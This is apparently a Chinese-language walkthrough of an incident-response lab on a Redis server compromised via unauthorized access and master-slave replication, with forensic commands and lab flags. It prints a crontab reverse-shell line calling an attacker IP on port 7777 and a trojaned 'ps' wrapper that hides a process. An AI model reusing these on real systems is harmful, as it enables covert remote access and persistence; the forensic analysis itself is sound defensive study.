第二章日志分析-redis应急响应

步骤一

redis一般就是打一个未授权，然后搞主从复制，去获取权限的

直接看在/var/log下的redis日志，发现这个地方在进行全复制，上面一看，连接的ip是192.168.100.20，所以应该是攻击者的ip

步骤二

仔细看下面加载了一个exp.so的模块，这就是主从攻击的常用手法

root@ip-10-0-10-3:/# find  / -type f -name exp.so
/exp.so

root@ip-10-0-10-3:/# strings exp.so | awk '/-/'
flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}
GCC: (Debian 12.2.0-14) 12.2.0
GNU C99 12.2.0 -mtune=generic -march=x86-64 -g -std=gnu99 -fPIC -fasynchronous-unwind-tables
/opt/redis-rogue-getshell/RedisModulesSDK/exp
/usr/include/x86_64-linux-gnu/bits
/usr/lib/gcc/x86_64-linux-gnu/12/include
/usr/include/x86_64-linux-gnu/bits/types
/usr/include/x86_64-linux-gnu/sys
stdint-intn.h
stdint-uintn.h
<built-in>

步骤三

root@ip-10-0-10-3:/# cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

要的是反弹shell，可能是写到了计划任务里面，毕竟redis写如计划任务拿权限是攻击的一种手段，这个我也没思路，看wp的，也可以拿linpeas.sh跑

root@ip-10-0-10-3:/etc# crontab -l
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
*/1 * * * *  /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1
# m h  dom mon dow   command

一个备份的计划任务，一个反弹shell的计划任务

最后发现别的师傅看日志也可以做

cat /var/log/syslog.1 |grep '/dev/'

步骤四

要知道黑客的用户名可不容易啊，只有可能是他自己把自己的公钥写进来了，公钥里面包含用户名

root@ip-10-0-10-3:/# find / -type f -name authorized_keys
/root/.ssh/authorized_keys
/home/debian/.ssh/authorized_keys
root@ip-10-0-10-3:/# cat /root/.ssh/authorized_keys
REDIS0009�      redis-ver5.0.1�
�edis-bits�@�ctime�tO�dused-mem�XU
 aof-preamble���xxsshB9

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OEFvyb4ubM7YPvzG/FfO6jE4PjLdmuCUdGP+aeLeJB5SXYT6zHkU9wlfY/Fo4UuBlhTqBaS6Ih/Wf62KepzrMsTQQYcSG/Xp8lgFzVCCFAk7apzxfRCPNk1pxaGiEF6MPoCmUu1UhC3ta3xyh2c4KZls0hyFN9JZsuD+siT8KVqm856vQ+RaTrZi3ThMa5gbeH+v3ZUcO35ZfMKor/uWXffHT0Yi06dsgIMN3faIiBrd1Lg0B5kOTaDq3fHs8Qs7pvR9C4ZTm2AK/Oct8ULdsnfS2YWtrYyC8rzNip9Wf083ZY1B4bj1UoxD+QwgThh5VP3xgRd9KDSzEYIBabstGh8GU5zDxr0zIuhQM35I0aALvojXl4QaaEnZwpqU3ZkojPG2aNC0QdiBK7eKwA38Gk+V8DEWc/TTkO+wm3aXYdll5sPmoWTAonaln1nmCiTDn4jKb73DxYHfSgNIDpJ6fS5kbWL5UJnElWCrxzaXKHUlqXJj3x81Oz6baFNv8= xj-test-user

�<#5Mroot@ip-10-0-10-3:/# 

确实是写进来的，用户名xj-test-user，做到这里就可以了，后面是这是个github的用户，写了一个redisgetshell的脚本，里面有个字符串，现在人家更行了，里面没那个字符串了

flag{xj-test-user-wow-you-find-flag}

步骤五

命令应该就在/usr/bin下找，可是太多了，我没找到，看的wp

-rwxrwxrwx  1 root root         178 Jul 31  2023 ps
-rwxr-xr-x  1 root root      133432 Jul 31  2023 ps_

估计是要从权限下手吧，找一些权限异常的?

root@ip-10-0-10-1:/usr/bin# cat ps
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
        echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196
root@ip-10-0-10-1:/usr/bin#

写在最后

这个靶机不是展现了一个攻击流程，而是展现了redis如何打，写公钥，主从复制，写计划任务，都是通过redis能拿到权限的，展示的是redis常见的黑客打法

但是这些都得有未授权或者无密码